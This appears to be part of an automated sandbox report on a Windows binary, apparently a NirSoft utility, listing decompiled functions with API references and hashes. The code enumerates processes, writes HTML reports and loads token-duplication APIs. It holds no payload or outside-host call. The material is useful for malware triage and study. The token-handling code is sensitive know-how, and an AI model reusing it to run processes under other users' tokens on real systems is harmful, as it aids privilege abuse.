                                                                                      0x004091da
                                                                                      0x004091c9
                                                                                      0x004091b8
                                                                                      0x004091ff
                                                                                      0x00409202
                                                                                      0x00409202
                                                                                      0x00000000
                                                                                      0x004091ff

                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                      • API String ID: 1182944575-70141382
                                                                                      • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                      • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                      • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                      • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                      0x004090f5
                                                                                      0x00409171
                                                                                      0x00409171
                                                                                      0x004090fd
                                                                                      0x00409103
                                                                                      0x00409107
                                                                                      0x00409170
                                                                                      0x00000000
                                                                                      0x00409170
                                                                                      0x00409116
                                                                                      0x0040911a
                                                                                      0x0040911f
                                                                                      0x00409127
                                                                                      0x0040912b
                                                                                      0x00409130
                                                                                      0x00409138
                                                                                      0x0040913c
                                                                                      0x00409141
                                                                                      0x00409149
                                                                                      0x0040914d
                                                                                      0x00409152
                                                                                      0x0040915a
                                                                                      0x0040915e
                                                                                      0x00409163
                                                                                      0x00409165
                                                                                      0x00409165
                                                                                      0x00409163
                                                                                      0x00409152
                                                                                      0x00409141
                                                                                      0x00409130
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                      • API String ID: 667068680-3953557276
                                                                                      • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                      • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                      • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                      • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 56%
                                                                                      			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                      0x00409faf
                                                                                      0x00409fb4
                                                                                      0x00409fb5
                                                                                      0x00409fb6
                                                                                      0x0040a043
                                                                                      0x0040a04a
                                                                                      0x0040a058
                                                                                      0x0040a05f
                                                                                      0x0040a06d
                                                                                      0x0040a074
                                                                                      0x0040a08e
                                                                                      0x0040a099
                                                                                      0x0040a0ab
                                                                                      0x0040a0c9
                                                                                      0x0040a0ce
                                                                                      0x00000000
                                                                                      0x0040a0ce
                                                                                      0x00409fc3
                                                                                      0x00409fca
                                                                                      0x00409fd8
                                                                                      0x00409fdf
                                                                                      0x00409ff9
                                                                                      0x0040a006
                                                                                      0x0040a018
                                                                                      0x00000000

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf
                                                                                      • String ID: %%0.%df
                                                                                      • API String ID: 3473751417-763548558
                                                                                      • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                      • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                      • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                      • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 51%
                                                                                      			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                      0x00406216
                                                                                      0x0040621b
                                                                                      0x00406222
                                                                                      0x0040625f
                                                                                      0x00406263
                                                                                      0x00406269
                                                                                      0x00406271
                                                                                      0x00406273
                                                                                      0x00406289
                                                                                      0x00406289
                                                                                      0x0040628e
                                                                                      0x0040628f
                                                                                      0x004062a9
                                                                                      0x004062ab
                                                                                      0x004062ad
                                                                                      0x004062b0
                                                                                      0x004062c3
                                                                                      0x004062c3
                                                                                      0x004062d3
                                                                                      0x004062da
                                                                                      0x004062f1
                                                                                      0x004062f7
                                                                                      0x004062fe
                                                                                      0x0040630d
                                                                                      0x00406312
                                                                                      0x0040631e
                                                                                      0x00406327
                                                                                      0x00406275
                                                                                      0x00406283
                                                                                      0x00406283
                                                                                      0x00406285
                                                                                      0x00406287
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406277
                                                                                      0x0040627a
                                                                                      0x00406280
                                                                                      0x00406280
                                                                                      0x00000000
                                                                                      0x00406280
                                                                                      0x00000000
                                                                                      0x0040627a
                                                                                      0x00000000
                                                                                      0x00406283
                                                                                      0x00406273
                                                                                      0x00406224
                                                                                      0x00406224
                                                                                      0x00406229
                                                                                      0x0040622a
                                                                                      0x0040622f
                                                                                      0x00406236
                                                                                      0x0040623c
                                                                                      0x00406243
                                                                                      0x00406245
                                                                                      0x00406247
                                                                                      0x00406248
                                                                                      0x0040624b
                                                                                      0x00406254
                                                                                      0x00406254
                                                                                      0x0040632d
                                                                                      0x00406334

                                                                                      APIs
                                                                                      • LoadMenuW.USER32 ref: 00406236
                                                                                        • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                        • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                        • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                        • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                      • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                      • CreateDialogParamW.USER32 ref: 004062A9
                                                                                      • GetDesktopWindow.USER32 ref: 004062B4
                                                                                      • CreateDialogParamW.USER32 ref: 004062C1
                                                                                      • memset.MSVCRT ref: 004062DA
                                                                                      • GetWindowTextW.USER32 ref: 004062F1
                                                                                      • EnumChildWindows.USER32 ref: 0040631E
                                                                                      • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                        • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                      • String ID: caption
                                                                                      • API String ID: 973020956-4135340389
                                                                                      • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                      • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                      • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                      • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 65%
                                                                                      			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                      0x004081e4
                                                                                      0x004081ec
                                                                                      0x004081fc
                                                                                      0x00408200
                                                                                      0x00408215
                                                                                      0x0040821c
                                                                                      0x0040822a
                                                                                      0x00408231
                                                                                      0x0040823f
                                                                                      0x00408246
                                                                                      0x0040824b
                                                                                      0x0040824e
                                                                                      0x0040825a
                                                                                      0x0040825c
                                                                                      0x00408261
                                                                                      0x0040826c
                                                                                      0x0040826d
                                                                                      0x0040826e
                                                                                      0x00408273
                                                                                      0x00408273
                                                                                      0x00408276
                                                                                      0x0040827c
                                                                                      0x0040828a
                                                                                      0x00408290
                                                                                      0x004082ab
                                                                                      0x004082c5
                                                                                      0x004082c6
                                                                                      0x004082d1
                                                                                      0x004082d2
                                                                                      0x004082d3
                                                                                      0x004082e7
                                                                                      0x004082ec
                                                                                      0x004082f0
                                                                                      0x00000000
                                                                                      0x004082f5
                                                                                      0x004082fe

                                                                                      APIs
                                                                                      Strings
                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                      • API String ID: 1283228442-2366825230
                                                                                      • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                      • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                      • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                      • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 85%
                                                                                      			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}








                                                                                      0x0040920a
                                                                                      0x00409218
                                                                                      0x00409223
                                                                                      0x0040922c
                                                                                      0x0040924b
                                                                                      0x00409253
                                                                                      0x0040929b
                                                                                      0x004092e4
                                                                                      0x0040929d
                                                                                      0x004092a3
                                                                                      0x004092b1
                                                                                      0x004092bd
                                                                                      0x004092cc
                                                                                      0x004092d1
                                                                                      0x004092d8
                                                                                      0x004092dd
                                                                                      0x00409255
                                                                                      0x0040925b
                                                                                      0x00409269
                                                                                      0x00409275
                                                                                      0x00409282
                                                                                      0x0040928d
                                                                                      0x00409292
                                                                                      0x004092ec
                                                                                      0x004092ef
                                                                                      0x004092ef
                                                                                      0x00409231
                                                                                      0x00409232
                                                                                      0x00409233
                                                                                      0x00000000
                                                                                      0x00409239
                                                                                      0x0040921a
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 00409223
                                                                                      • wcscpy.MSVCRT ref: 00409233
                                                                                        • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                        • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                        • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                      • wcscpy.MSVCRT ref: 00409282
                                                                                      • wcscat.MSVCRT ref: 0040928D
                                                                                      • memset.MSVCRT ref: 00409269
                                                                                        • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                        • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                      • memset.MSVCRT ref: 004092B1
                                                                                      • memcpy.MSVCRT ref: 004092CC
                                                                                      • wcscat.MSVCRT ref: 004092D8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                      • String ID: \systemroot
                                                                                      • API String ID: 4173585201-1821301763
                                                                                      • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                      • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                      • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                      • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 48%
                                                                                      			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                      0x00409c73
                                                                                      0x00409c7c
                                                                                      0x00409c90
                                                                                      0x00409c9f
                                                                                      0x00409ca2
                                                                                      0x00409ca7
                                                                                      0x00409ca9
                                                                                      0x00409cb1
                                                                                      0x00409cc0
                                                                                      0x00409cc2
                                                                                      0x00409cc7
                                                                                      0x00409ccf
                                                                                      0x00409cd0
                                                                                      0x00409cd7
                                                                                      0x00409cd8
                                                                                      0x00409cd9
                                                                                      0x00409cda
                                                                                      0x00409cdc
                                                                                      0x00409ce0
                                                                                      0x00409ce1
                                                                                      0x00409ce9
                                                                                      0x00409cf1
                                                                                      0x00409cfb
                                                                                      0x00409d08
                                                                                      0x00409d08
                                                                                      0x00000000
                                                                                      0x00409d0d
                                                                                      0x00409d0f

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                      • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                      • strlen.MSVCRT ref: 00409CE4
                                                                                      • strlen.MSVCRT ref: 00409CF1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcstrlen
                                                                                      • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                      • API String ID: 1027343248-2054640941
                                                                                      • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                      • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                      • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                      • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                      0x004028a3
                                                                                      0x004028ab
                                                                                      0x004028bd
                                                                                      0x004028ca
                                                                                      0x004028d7
                                                                                      0x004028e3
                                                                                      0x004028e6
                                                                                      0x004028e8
                                                                                      0x00000000
                                                                                      0x004028eb
                                                                                      0x004028ec

                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
